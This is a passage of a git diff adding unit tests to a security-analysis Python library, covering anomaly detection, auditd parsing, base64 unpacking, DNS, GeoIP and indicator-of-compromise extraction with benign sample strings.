+        msg += f"See notebook '{nb_err}' for the traceback."
+        print(msg)
+        with open(nb_err, mode="w", encoding="utf-8") as f:
+            nbformat.write(nb, f)
+        raise
diff --git a/tests/nbtools/test_timeseries.py b/tests/nbtools/test_timeseries.py
new file mode 100644
index 000000000..396cd8151
--- /dev/null
+++ b/tests/nbtools/test_timeseries.py
@@ -0,0 +1,116 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+from collections import Counter
+import os
+import unittest
+from pathlib import Path
+
+import nbformat
+import pandas as pd
+import pytest
+from nbconvert.preprocessors import CellExecutionError, ExecutePreprocessor
+
+from msticpy.analysis.timeseries import (
+    timeseries_anomalies_stl,
+    extract_anomaly_periods,
+    create_time_period_kqlfilter,
+    set_new_anomaly_threshold,
+)
+
+_NB_FOLDER = "docs/notebooks"
+_NB_NAME = "TimeSeriesAnomaliesVisualization.ipynb"
+
+_test_data_folders = [
+    d for d, _, _ in os.walk(os.getcwd()) if d.endswith("/docs/notebooks/data")
+]
+if len(_test_data_folders) == 1:
+    _TEST_DATA = _test_data_folders[0]
+else:
+    _TEST_DATA = "./docs/notebooks/data"
+
+
+class TestTimeSeries(unittest.TestCase):
+    """Unit test class."""
+
+    def setUp(self):
+        input_file = os.path.join(_TEST_DATA, "TimeSeriesDemo.csv")
+        self.input_df = pd.read_csv(
+            input_file,
+            index_col=["TimeGenerated"],
+            parse_dates=["TimeGenerated"],
+            infer_datetime_format=True,
+            usecols=["TimeGenerated", "TotalBytesSent"],
+        )
+        self.output_df = timeseries_anomalies_stl(data=self.input_df)
+
+    def test_timeseries_anomalies_stl(self):
+        out_df = self.output_df
+
+        self.assertIn("residual", out_df.columns)
+        self.assertIn("trend", out_df.columns)
+        self.assertIn("seasonal", out_df.columns)
+        self.assertIn("weights", out_df.columns)
+        self.assertIn("baseline", out_df.columns)
+        self.assertIn("score", out_df.columns)
+        self.assertIn("anomalies", out_df.columns)
+        self.assertGreater(len(out_df[out_df["anomalies"] == 1]), 0)
+
+        self.output_df = out_df
+
+    @pytest.mark.skipif(
+        not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+    )
+    def test_timeseries_controls(self):
+        nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
+        abs_path = Path(_NB_FOLDER).absolute()
+        with open(nb_path) as f:
+            nb = nbformat.read(f, as_version=4)
+        ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
+
+        try:
+            ep.preprocess(nb, {"metadata": {"path": abs_path}})
+        except CellExecutionError:
+            nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
+            msg = f"Error executing the notebook '{nb_path}'.\n"
+            msg += f"See notebook '{nb_err}' for the traceback."
+            print(msg)
+            with open(nb_err, mode="w", encoding="utf-8") as f:
+                nbformat.write(nb, f)
+            raise
+
+    def test_extract_anomaly_periods(self):
+        """Test extracting anomaly periods."""
+        if self.output_df is None:
+            raise ValueError("No dataframe loaded")
+
+        periods = extract_anomaly_periods(self.output_df)
+        self.assertEqual(len(periods), 3)
+
+        neg_periods = extract_anomaly_periods(self.output_df, pos_only=False)
+        self.assertEqual(len(neg_periods), 3)
+
+        k_filter = create_time_period_kqlfilter(periods)
+        self.assertIsNotNone(k_filter)
+        self.assertIn("where TimeGenerated", k_filter)
+        count_words = Counter(k_filter.split(" "))
+        self.assertEqual(count_words["between"], len(periods))
+
+    def test_set_threshold(self):
+        """Test setting new thresholds on data."""
+        old_anoms = len(self.output_df[self.output_df["anomalies"] == 1])
+        self.assertEqual(old_anoms, 3)
+        new_df = set_new_anomaly_threshold(self.output_df, 2.5)
+        new_anoms = len(new_df[new_df["anomalies"] == 1])
+        self.assertEqual(new_anoms, 10)
+        new_anoms = len(new_df[new_df["anomalies"] == -1])
+        self.assertEqual(new_anoms, 13)
+
+        # Use different thresholds for pos and neg
+        new_df = set_new_anomaly_threshold(self.output_df, 2.5, 3.5)
+        new_anoms = len(new_df[new_df["anomalies"] == 1])
+        self.assertEqual(new_anoms, 10)
+        new_anoms = len(new_df[new_df["anomalies"] == -1])
+        self.assertEqual(new_anoms, 3)
diff --git a/tests/nbtools/test_user_config.py b/tests/nbtools/test_user_config.py
new file mode 100644
index 000000000..388942588
--- /dev/null
+++ b/tests/nbtools/test_user_config.py
@@ -0,0 +1,116 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module docstring."""
+import os
+import pytest
+import pytest_check as check
+import yaml
+
+import msticpy
+from msticpy.data import QueryProvider
+from msticpy.nbtools import user_config
+from msticpy.common.pkg_config import settings
+
+# pylint: disable=redefined-outer-name, unused-import, ungrouped-imports
+try:
+    import msticnb  # noqa: F401
+
+    _NOTEBOOKLETS = True
+except ImportError:
+    _NOTEBOOKLETS = False
+
+try:
+    from msticpy.datamodel.pivot import Pivot  # noqa: F401
+
+    _PIVOT = True
+except ImportError:
+    _PIVOT = False
+
+from ..unit_test_lib import custom_mp_config
+
+__author__ = "Ian Hellen"
+
+
+CONFIG_TEXT = """
+UserDefaults:
+  # List of query providers to load
+  QueryProviders:
+    AzureSentinel:
+      Default:
+        alias: asi
+        connect: False
+      CyberSoc:
+        alias: soc
+        connect: False
+    Splunk:
+      connect: False
+    LocalData:
+      alias: local
+  # List of other providers/components to load
+  LoadComponents:
+    TILookup:
+    GeoIpLookup:
+      provider: IpStackLookup
+    Notebooklets:
+      query_provider:
+        LocalData:
+          workspace: CyberSoc
+          some_param: some_value
+    Pivot:
+    AzureData:
+      auth_methods: ['cli','interactive']
+      connect: False
+    AzureSentinelAPI:
+      auth_methods: ['cli','interactive']
+      res_id: "subscriptions/bab8ff42-bb7b-42ca-873e-d13c5eb5ffb8/resourceGroups/TestRG/providers/Microsoft.OperationalInsights/workspaces/SentinelWorkspace"
+      connect: False
+"""
+
+_NOTEBOOKLETS = False
+
+
+@pytest.fixture(scope="module")
+def mp_settings():
+    """Return test settings."""
+    settings_dict = yaml.safe_load(CONFIG_TEXT)
+    if not _NOTEBOOKLETS and settings_dict["UserDefaults"].get(
+        "LoadComponents", {}
+    ).get("Notebooklets"):
+        del settings_dict["UserDefaults"]["LoadComponents"]["Notebooklets"]
+    if not _PIVOT and settings_dict["UserDefaults"].get("LoadComponents", {}).get(
+        "Pivot"
+    ):
+        del settings_dict["UserDefaults"]["LoadComponents"]["Pivot"]
+    return settings_dict
+
+
+def test_user_config(mp_settings):
+    """Test user config."""
+    mpcfg_path = os.environ.get("MSTICPYCONFIG")
+    with custom_mp_config(mp_path=mpcfg_path):
+        settings["UserDefaults"] = mp_settings.get("UserDefaults")
+        prov_dict = user_config.load_user_defaults()
+
+    check.is_in("qry_asi", prov_dict)
+    check.is_instance(prov_dict["qry_asi"], QueryProvider)
+    check.equal(prov_dict["qry_asi"].environment, "AzureSentinel")
+    check.is_in("qry_soc", prov_dict)
+    check.is_instance(prov_dict["qry_soc"], QueryProvider)
+    check.equal(prov_dict["qry_asi"].environment, "AzureSentinel")
+    check.is_in("qry_splunk", prov_dict)
+    check.is_instance(prov_dict["qry_splunk"], QueryProvider)
+    check.equal(prov_dict["qry_splunk"].environment, "Splunk")
+    check.is_in("qry_local", prov_dict)
+    check.is_instance(prov_dict["qry_local"], QueryProvider)
+    check.is_true(prov_dict["qry_local"].connected)
+    check.equal(prov_dict["qry_local"].environment, "LocalData")
+
+    check.is_in("ti_lookup", prov_dict)
+    check.is_in("geoip", prov_dict)
+    check.is_in("az_data", prov_dict)
+    check.is_in("azs_api", prov_dict)
+
+    check.is_true(hasattr(msticpy, "current_providers"))
diff --git a/tests/sectools/__init__.py b/tests/sectools/__init__.py
new file mode 100644
index 000000000..6ea13d44c
--- /dev/null
+++ b/tests/sectools/__init__.py
@@ -0,0 +1,6 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Init for test package."""
diff --git a/tests/sectools/test_auditdextract.py b/tests/sectools/test_auditdextract.py
new file mode 100644
index 000000000..e7b76b939
--- /dev/null
+++ b/tests/sectools/test_auditdextract.py
@@ -0,0 +1,146 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""auditd extract test class."""
+import ast
+import unittest
+import os
+
+import pandas as pd
+import pytest
+import pytest_check as check
+
+from msticpy.sectools.auditdextract import (
+    extract_events_to_df,
+    get_event_subset,
+    generate_process_tree,
+    read_from_file,
+)
+
+from msticpy.sectools.process_tree_utils import get_summary_info
+
+_CLUSTER_OK = False
+try:
+    from msticpy.analysis.cluster_auditd import cluster_auditd_processes
+
+    _CLUSTER_OK = True
+except ImportError:
+    pass
+
+
+_test_data_folders = [
+    d for d, _, _ in os.walk(os.getcwd()) if d.endswith("/tests/testdata")
+]
+if len(_test_data_folders) == 1:
+    _TEST_DATA = _test_data_folders[0]
+else:
+    _TEST_DATA = "./tests/testdata"
+
+
+class TestAuditdExtract(unittest.TestCase):
+    """Unit test class."""
+
+    def test_extract_from_log_analytics(self):
+        input_file = os.path.join(_TEST_DATA, "linux_events.csv")
+        input_df = pd.read_csv(input_file)
+
+        import_time = input_df["TimeGenerated"].iloc[0]
+        self.assertGreaterEqual(input_df.shape[0], 100)
+
+        input_df["AuditdMessage"] = input_df.apply(
+            lambda x: ast.literal_eval(x.AuditdMessage), axis=1
+        )
+
+        output_df = extract_events_to_df(data=input_df)
+        self.assertGreaterEqual(output_df.shape[0], 100, "Expected >=100 rows")
+        self.assertGreaterEqual(output_df.shape[1], 32, "Expected >=32 colums")
+        event_types = output_df["EventType"].drop_duplicates().to_list()
+        self.assertIn("USER_END", event_types)
+        self.assertIn("CRED_DISP", event_types)
+        self.assertIn("SYSCALL_EXECVE", event_types)
+        self.assertIn("USER_ACCT", event_types)
+        self.assertIn("CRED_ACQ", event_types)
+        self.assertIn("LOGIN", event_types)
+        self.assertIn("USER_START", event_types)
+        self.assertIn("USER_CMD", event_types)
+        self.assertIn("CRED_REFR", event_types)
+
+        self.assertGreaterEqual(
+            len(output_df[output_df["EventType"] == "SYSCALL_EXECVE"]),
+            82,
+            "Expected EXECVE events",
+        )
+        self.assertGreaterEqual(
+            len(output_df[output_df["EventType"] == "LOGIN"]),
+            1,
+            "Expected LOGIN events",
+        )
+        self.assertGreaterEqual(
+            len(output_df[output_df["EventType"] == "USER_CMD"]),
+            2,
+            "Expected USER_CMD events",
+        )
+        self.assertGreaterEqual(
+            len(output_df[output_df["EventType"] == "USER_ACCT"]),
+            1,
+            "Expected USER_ACCT events",
+        )
+
+        for _, execve_event in output_df[output_df["EventType"] == "SYSCALL_EXECVE"][
+            1:20
+        ].iterrows():
+            self.assertIsNotNone(execve_event.Computer)
+            self.assertIsNotNone(execve_event.TimeGenerated)
+            self.assertNotEqual(import_time, execve_event.TimeGenerated)
+            self.assertIsNotNone(execve_event.exe)
+            self.assertIsNotNone(execve_event.cmdline)
+            self.assertIsNotNone(execve_event.cwd)
+
+        for _, login_event in output_df[output_df["EventType"] == "LOGIN"].iterrows():
+            self.assertIsNotNone(login_event.Computer)
+            self.assertIsNotNone(login_event.acct)
+            self.assertIsNotNone(login_event.TimeGenerated)
+            self.assertNotEqual(import_time, login_event.TimeGenerated)
+
+    def test_auditd_from_file(self):
+        input_file = os.path.join(_TEST_DATA, "auditd_log.txt")
+        parsed_events = read_from_file(input_file)
+        self.assertIsNotNone(parsed_events)
+        self.assertEqual(parsed_events.shape, (381, 97))
+
+        proc_events = get_event_subset(parsed_events, event_type="SYSCALL_EXECVE")
+        self.assertIsNotNone(proc_events)
+        self.assertEqual(proc_events.shape, (78, 20))
+
+    def test_auditd_utils(self):
+        input_file = os.path.join(_TEST_DATA, "linux_events.csv")
+        input_df = pd.read_csv(input_file)
+
+        input_df["AuditdMessage"] = input_df.apply(
+            lambda x: ast.literal_eval(x.AuditdMessage), axis=1
+        )
+        output_df = extract_events_to_df(data=input_df)
+        proc_events = get_event_subset(output_df, event_type="SYSCALL_EXECVE")
+
+        proc_tree = generate_process_tree(proc_events)
+        pt_summary = get_summary_info(proc_tree)
+        self.assertGreaterEqual(len(proc_tree), 85)
+        self.assertEqual(pt_summary["LargestTreeDepth"], 5)
+
+
+@pytest.mark.skipif(not _CLUSTER_OK, reason="Partial install of msticpy")
+def test_auditd_cluster():
+    input_file = os.path.join(_TEST_DATA, "linux_events.csv")
+    input_df = pd.read_csv(input_file)
+
+    input_df["AuditdMessage"] = input_df.apply(
+        lambda x: ast.literal_eval(x.AuditdMessage), axis=1
+    )
+    output_df = extract_events_to_df(data=input_df)
+    proc_events = get_event_subset(output_df, event_type="SYSCALL_EXECVE")
+
+    clustered_procs = cluster_auditd_processes(proc_events, app=None)
+    check.is_not_none(clustered_procs)
+    check.equal(len(clustered_procs), 2)
diff --git a/tests/sectools/test_b64unpack.py b/tests/sectools/test_b64unpack.py
new file mode 100644
index 000000000..7e9748113
--- /dev/null
+++ b/tests/sectools/test_b64unpack.py
@@ -0,0 +1,100 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Base64unpack test class."""
+import unittest
+from os import path
+
+import pandas as pd
+
+from msticpy.sectools import base64unpack as b64
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+
+class TestB64Unpack(unittest.TestCase):
+    """Unit test class."""
+
+    def test_archive_string(self):
+        try:
+            input_txt = None
+            FILE_NAME = path.join(TEST_DATA_PATH, "b64text_inzip.txt")
+            with open(FILE_NAME, "r") as f_handle:
+                input_txt = f_handle.read()
+
+            self.assertIsNotNone(input_txt)
+
+            result_str, result_df = b64.unpack_items(input_string=input_txt, trace=True)
+            print(result_str)
+            # assert result_df.shape == (2, 12)
+            self.assertIsNotNone(result_str)
+            self.assertIsNotNone(result_df)
+
+            result_str, result_df = b64.unpack(input_string=input_txt, trace=True)
+            print(result_str)
+            # assert result_df.shape == (2, 12)
+            self.assertIsNotNone(result_str)
+            self.assertIsNotNone(result_df)
+
+        except FileNotFoundError as ex:
+            self.fail(msg="Exception {}".format(str(ex)))
+
+    def test_nested_archive(self):
+        try:
+            input_txt = None
+            FILE_NAME = path.join(TEST_DATA_PATH, "base64msg.txt")
+            with open(FILE_NAME, "r") as f_handle:
+                input_txt = f_handle.read()
+
+            self.assertIsNotNone(input_txt)
+
+            result_str, result_df = b64.unpack_items(input_string=input_txt, trace=True)
+            self.assertEqual(result_df.shape, (8, 12))
+            self.assertIsNotNone(result_str)
+            self.assertIsNotNone(result_df)
+
+            result_str, result_df = b64.unpack(input_string=input_txt, trace=True)
+            self.assertEqual(result_df.shape, (8, 12))
+            self.assertIsNotNone(result_str)
+            self.assertIsNotNone(result_df)
+
+            result_str, result_df = b64.unpack(input_string=input_txt, trace=True)
+            self.assertEqual(result_df.shape, (8, 12))
+            self.assertIsNotNone(result_str)
+            self.assertIsNotNone(result_df)
+
+        except FileNotFoundError as ex:
+            self.fail(msg="Exception {}".format(str(ex)))
+
+    def test_nested_archive_df(self):
+        try:
+            input_txt = None
+            FILE_NAME = path.join(TEST_DATA_PATH, "base64msg.txt")
+            with open(FILE_NAME, "r") as f_handle:
+                input_txt = f_handle.read()
+
+            self.assertIsNotNone(input_txt)
+            # create datframe for input with 2 rows and add same data to both
+            input_df = pd.DataFrame(data=["a", "b"], columns=["input"], index=[0, 1])
+            input_df["input"] = input_txt
+            result_df = b64.unpack_items(data=input_df, column="input", trace=True)
+            # we should get 2x the rows as the previous test (since data is duplicated)
+            # plus 2 added columns
+            self.assertEqual(result_df.shape, (16, 15))
+            self.assertIsNotNone(result_df)
+
+            result_df = b64.unpack_df(data=input_df, column="input", trace=True)
+            # we should get 2x the rows as the previous test (since data is duplicated)
+            # plus 2 added columns
+            self.assertEqual(result_df.shape, (16, 15))
+            self.assertIsNotNone(result_df)
+
+        except FileNotFoundError as ex:
+            self.fail(msg="Exception {}".format(str(ex)))
+
+
+if __name__ == "__main__":
+    unittest.main()
+    print("bye")
diff --git a/tests/sectools/test_cmd_line.py b/tests/sectools/test_cmd_line.py
new file mode 100644
index 000000000..069a869fa
--- /dev/null
+++ b/tests/sectools/test_cmd_line.py
@@ -0,0 +1,50 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+import os
+
+import pandas as pd
+
+from pytest import raises
+
+from msticpy.common.exceptions import MsticpyException
+from msticpy.sectools import cmd_line as cl
+
+from ..unit_test_lib import TEST_DATA_PATH
+
+
+def test_risky_cmd_line():
+    input_file = os.path.join(TEST_DATA_PATH, "sudo_data.csv")
+    input_df = pd.read_csv(input_file)
+    output = cl.risky_cmd_line(events=input_df, log_type="Syslog")
+    assert len(output) >= 1  # nosec
+    assert type(output) == dict  # nosec
+    assert output["2019-07-05T18:19:52.873Z"] == "/bin/bash"  # nosec
+    with raises(MsticpyException):
+        cl.risky_cmd_line(events=input_df, log_type="Syslog", cmd_field="Test")
+
+
+def test_cmd_speed():
+    input_file = os.path.join(TEST_DATA_PATH, "sudo_data_speed.csv")
+    input_df = pd.read_csv(input_file, parse_dates=["TimeGenerated"])
+    output = cl.cmd_speed(cmd_events=input_df, cmd_field="Command")
+    assert len(output) >= 1  # nosec
+    assert type(output[0]) == dict  # nosec
+    with raises(MsticpyException):
+        output = cl.cmd_speed(cmd_events=input_df, cmd_field="Test")
+
+
+def test_syslog_risky_actions():
+    input_file = os.path.join(TEST_DATA_PATH, "syslog_data.csv")
+    input_df = pd.read_csv(input_file)
+    risky_stuff = os.path.join(TEST_DATA_PATH, "risky_stuff_custom.json")
+    output = cl.risky_cmd_line(
+        events=input_df,
+        log_type="Syslog",
+        cmd_field="SyslogMessage",
+        detection_rules=risky_stuff,
+    )
+    assert len(output) >= 1  # nosec
+    assert type(output) == dict  # nosec
diff --git a/tests/sectools/test_domain_utils.py b/tests/sectools/test_domain_utils.py
new file mode 100644
index 000000000..8e19c5dfd
--- /dev/null
+++ b/tests/sectools/test_domain_utils.py
@@ -0,0 +1,52 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""domain_utilstes extract test class."""
+import pytest_check as check
+
+from msticpy.sectools import domain_utils
+
+
+def test_validate_domain():
+    test_dom_val = domain_utils.DomainValidator()
+    valid_tld = test_dom_val.validate_tld("www.microsoft.com")
+    resolvable = test_dom_val.is_resolvable("www.microsoft.com")
+    blacklisted = test_dom_val.in_abuse_list("www.microsoft.com")
+    assert valid_tld
+    assert resolvable
+    assert not blacklisted[0]
+
+
+def test_validate_domain_fail():
+    test_dom_val = domain_utils.DomainValidator()
+    valid_tld = test_dom_val.validate_tld("www.contoso.garbage")
+    resolvable = test_dom_val.is_resolvable("www.contoso.garbage")
+    blacklisted = test_dom_val.in_abuse_list("www.contoso.garbage")
+    assert not valid_tld
+    assert not resolvable
+    assert not blacklisted[0]
+    assert blacklisted[1] is None
+
+
+def test_resolver_funcs():
+    """Test domain utils functions."""
+    result = domain_utils.dns_resolve("www.microsoft.com")
+    check.is_not_none(result["qname"])
+    check.is_true(result["rrset"])
+    ip = result["rrset"][0]
+    result = domain_utils.dns_resolve("www.contoso.garbage")
+    check.is_not_none(result)
+    check.is_false(result.get("rrset"))
+
+    result = domain_utils.ip_rev_resolve(ip)
+    check.is_not_none(result)
+
+    result = domain_utils.dns_components("www.microsoft.com")
+    check.equal(result["subdomain"], "www")
+    check.equal(result["domain"], "microsoft")
+    check.equal(result["suffix"], "com")
+    result = domain_utils.url_components("http://www.microsoft.com")
+    check.equal(result["scheme"], "http")
+    check.equal(result["host"], "www.microsoft.com")
diff --git a/tests/sectools/test_geoip.py b/tests/sectools/test_geoip.py
new file mode 100644
index 000000000..f403add84
--- /dev/null
+++ b/tests/sectools/test_geoip.py
@@ -0,0 +1,132 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""GeoIP provider unit tests."""
+import os
+from pathlib import Path
+import socket
+
+import nbformat
+import pytest
+import pytest_check as check
+
+from nbconvert.preprocessors import CellExecutionError, ExecutePreprocessor
+
+from msticpy.sectools.geoip import GeoLiteLookup, IPStackLookup
+
+from ..unit_test_lib import custom_mp_config, get_test_data_path
+
+_NB_FOLDER = "docs/notebooks"
+_NB_NAME = "GeoIPLookups.ipynb"
+_MP_CONFIG_PATH = get_test_data_path().parent.joinpath("msticpyconfig-test.yaml")
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+)
+@pytest.mark.skipif(
+    os.environ.get("MSTICPY_BUILD_SOURCE", "").casefold() == "fork",
+    reason="External fork.",
+)
+def test_geoip_notebook():
+    """Test geoip notebook."""
+    nb_path = Path(_NB_FOLDER).joinpath(_NB_NAME)
+    abs_path = Path(_NB_FOLDER).absolute()
+
+    if not os.environ.get("MSTICPY_TEST_IPSTACK"):
+        os.environ["MSTICPY_SKIP_IPSTACK_TEST"] = "1"
+    with open(nb_path, "rb") as f:
+        nb_bytes = f.read()
+    nb_text = nb_bytes.decode("utf-8")
+    nb = nbformat.reads(nb_text, as_version=4)
+    ep = ExecutePreprocessor(timeout=600, kernel_name="python3")
+
+    try:
+        with custom_mp_config(_MP_CONFIG_PATH):
+            ep.preprocess(nb, {"metadata": {"path": abs_path}})
+
+    except CellExecutionError:
+        nb_err = str(nb_path).replace(".ipynb", "-err.ipynb")
+        msg = f"Error executing the notebook '{nb_path}'.\n"
+        msg += f"See notebook '{nb_err}' for the traceback."
+        print(msg)
+        with open(nb_err, mode="w", encoding="utf-8") as f:
+            nbformat.write(nb, f)
+        raise
+
+    if os.environ.get("MSTICPY_SKIP_IPSTACK_TEST"):
+        del os.environ["MSTICPY_SKIP_IPSTACK_TEST"]
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_NOSKIP"), reason="Skipped for local tests."
+)
+@pytest.mark.skipif(
+    os.environ.get("MSTICPY_BUILD_SOURCE", "").casefold() == "fork",
+    reason="External fork.",
+)
+def test_geoiplite_download(tmp_path):
+    """Test forced download of GeoIPLite DB."""
+    test_folder = tmp_path / "test_geolite_data"
+    tgt_folder = Path(test_folder).resolve()
+    try:
+        tgt_folder.mkdir(exist_ok=True)
+        with pytest.warns(None) as warning_record:
+            with custom_mp_config(_MP_CONFIG_PATH):
+                ip_location = GeoLiteLookup(
+                    db_folder=str(tgt_folder), force_update=True, debug=True
+                )
+                ip_location.close()
+        if warning_record:
+            print(f"{len(warning_record)} warnings recorded")
+        for warning_item in warning_record:
+            print(vars(warning_item))
+        # Check that we don't have a warning from GeoIPLookup
+        # (occasionally warnings are generated by the test infrastructure
+        # that filter through to this test)
+        check.is_false(
+            any(
+                isinstance(warn.message, str)
+                and warn.message.startswith("GeoIpLookup:")
+                for warn in warning_record.list
+            )
+        )
+    finally:
+        if tgt_folder.exists():
+            for file in tgt_folder.glob("*"):
+                file.unlink()
+            tgt_folder.rmdir()
+
+
+def test_geoiplite_lookup():
+    """Test GeoLite lookups."""
+    socket_info = socket.getaddrinfo("pypi.org", 0, 0, 0, 0)
+
+    ips = [res[4][0] for res in socket_info]
+    with custom_mp_config(_MP_CONFIG_PATH):
+        ip_location = GeoLiteLookup()
+
+        loc_result, ip_entities = ip_location.lookup_ip(ip_addr_list=ips)
+        check.equal(len(ip_entities), len(ips))
+        check.equal(len(loc_result), len(ips))
+        for ip_entity in ip_entities:
+            check.is_not_none(ip_entity.Location)
+
+
+@pytest.mark.skipif(
+    not os.environ.get("MSTICPY_TEST_IPSTACK"), reason="Skipped ip stack tests."
+)
+def test_ipstack_lookup():
+    """Test IPStack lookups."""
+    socket_info = socket.getaddrinfo("pypi.org", 0, 0, 0, 0)
+
+    ips = [res[4][0] for res in socket_info]
+    with custom_mp_config(_MP_CONFIG_PATH):
+        ip_location = IPStackLookup()
+        loc_result, ip_entities = ip_location.lookup_ip(ip_addr_list=ips)
+        check.equal(len(ip_entities), len(ips))
+        check.equal(len(loc_result), len(ips))
+        for ip_entity in ip_entities:
+            check.is_not_none(ip_entity.Location)
diff --git a/tests/sectools/test_ioc_extractor.py b/tests/sectools/test_ioc_extractor.py
new file mode 100644
index 000000000..c3b72da14
--- /dev/null
+++ b/tests/sectools/test_ioc_extractor.py
@@ -0,0 +1,200 @@
+import unittest
+
+import pandas as pd
+
+# Test code
+from msticpy.sectools.iocextract import IoCExtract
+
+TEST_CASES = {
+    "ipv4_test": r"c:\one\path\or\another\myprocess -ip4:206.123.1.123",
+    "ipv6_test": r"""c:\one\path\or\another\myprocess -ip6:(2001:0db8:85a3:0000:0000:8a2e:0370:7334,
+    2001:db8:85a3:0:0:8a2e:370:7334,2001:db8:85a3::8a2e:370:7334,::ffff:192.0.2.128)""",
+    "url_test": r"""c:\one\path\or\another\myprocess /url:https://some.domain.it/thepath?qry1=abc&qry2=xyz
+        /url:https://myuser@some.domain.es:88/thepath?qry1=abc&qry2=xyz"<some other trailing stuff""",
+    "windows_path_test": r'c:\one\path\or\another\myprocess -file:"..\another\file" -file:"\\uncpath\file"',
+    "linux_path_test": r"/bin/bash --file:./bish --file:/bin/bash --file:../../bosh",
+    "md5_hash_test": "00236a2ae558018ed13b5222ef1bd987hash -something-hash=00236a2ae558018ed13b5222ef1bd988hash -something -hash=00236a2ae558018ed13b5222ef1bd989",
+    "sha1_hash_test": "00236a2ae558018ed13b5222ef1bd98700000001hash -something -hash=00236a2ae558018ed13b5222ef1bd98700000002hash -something -hash=00236a2ae558018ed13b5222ef1bd98700000003",
+    "sha256_hash_test": """00236a2ae558018ed13b5222ef1bd98700000001424246789042424678901234hash -something -hash=00236a2ae558018ed13b5222ef1bd98700000001424246789042424678901235hash -something
+-hash=00236a2ae558018ed13b5222ef1bd98700000001424246789042424678901236""",
+    "url2_test": "curl 'https://www.virustotal.com/en/ip-address/90.156.201.27/information/'",
+    "domain1_test": "some text with a domain.like.uk in it",
+    "domain_neg_test": "some text with a bad domain.like.iandom in it",
+    "domain_short_test": "some text with a microsoft.com in it",
+}
+
+
+class TestIoCExtractor(unittest.TestCase):
+    """Unit test class."""
+
+    def __run_extract(self, extractor=None, testcase=None, expected_items=None):
+        if extractor is None or testcase is None or expected_items is None:
+            raise Exception("One or more required parameters were missing")
+
+        test_input = TEST_CASES[testcase + "_test"]
+        results = extractor.extract(test_input, include_paths=True)
+        for k, v in expected_items.items():
+            self.assertEqual(len(results[k]), v, "Unexpected value for " + k)
+
+    def setUp(self):
+        self.extractor = IoCExtract()
+
+    def test_ipv4(self):
+        self.__run_extract(self.extractor, "ipv4", {"ipv4": 1})
+
+    def test_ipv6(self):
+        self.__run_extract(self.extractor, "ipv6", {"ipv6": 3})
+
+    def test_url(self):
+        self.__run_extract(self.extractor, "url", {"url": 2, "dns": 2, "ipv4": 0})
+        self.__run_extract(self.extractor, "url2", {"url": 1, "dns": 1, "ipv4": 1})
+
+    def test_windows_path(self):
+        self.__run_extract(self.extractor, "windows_path", {"windows_path": 3})
+
+    def test_linux_path(self):
+        self.__run_extract(self.extractor, "linux_path", {"linux_path": 3})
+
+    def test_hashes(self):
+        self.__run_extract(self.extractor, "md5_hash", {"md5_hash": 3})
+        self.__run_extract(self.extractor, "sha1_hash", {"sha1_hash": 3})
+        self.__run_extract(self.extractor, "sha256_hash", {"sha256_hash": 3})
+
+    def test_dns(self):
+        self.__run_extract(self.extractor, "domain1", {"dns": 1})
+        self.__run_extract(self.extractor, "domain_neg", {"dns": 0})
+        self.__run_extract(self.extractor, "domain_short", {"dns": 1})
+
+    def test_dataframe(self):
+
+        input_df = pd.DataFrame.from_dict(
+            data=TEST_CASES, orient="index", columns=["input"]
+        )
+        output_df = self.extractor.extract(
+            data=input_df, columns=["input"], include_paths=True
+        )
+
+        self.assertGreater(output_df.shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv4"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv6"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "url"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "windows_path"].shape[0], 6)
+        self.assertEqual(output_df[output_df["IoCType"] == "linux_path"].shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "md5_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha1_hash"].shape[0], 3)
+        self.assertEqual(output_df[output_df["IoCType"] == "sha256_hash"].shape[0], 3)
+
+        input_df = pd.DataFrame.from_dict(
+            data=TEST_CASES, orient="index", columns=["input"]
+        )
+        ioc_types = [
+            "ipv4",
+            "ipv6",
+            "url",
+            "linux_path",
+            "md5_hash",
+            "sha1_hash",
+            "sha256_hash",
+        ]
+        output_df = self.extractor.extract(
+            data=input_df, columns=["input"], include_paths=True, ioc_types=ioc_types
+        )
+        # for _, row in output_df[output_df['IoCType'] == 'url'].iterrows():
+        #     print(row.Observable)
+        self.assertGreater(output_df.shape[0], 0)
+        self.assertEqual(output_df[output_df["IoCType"] == "ipv4"].shape[0], 3)
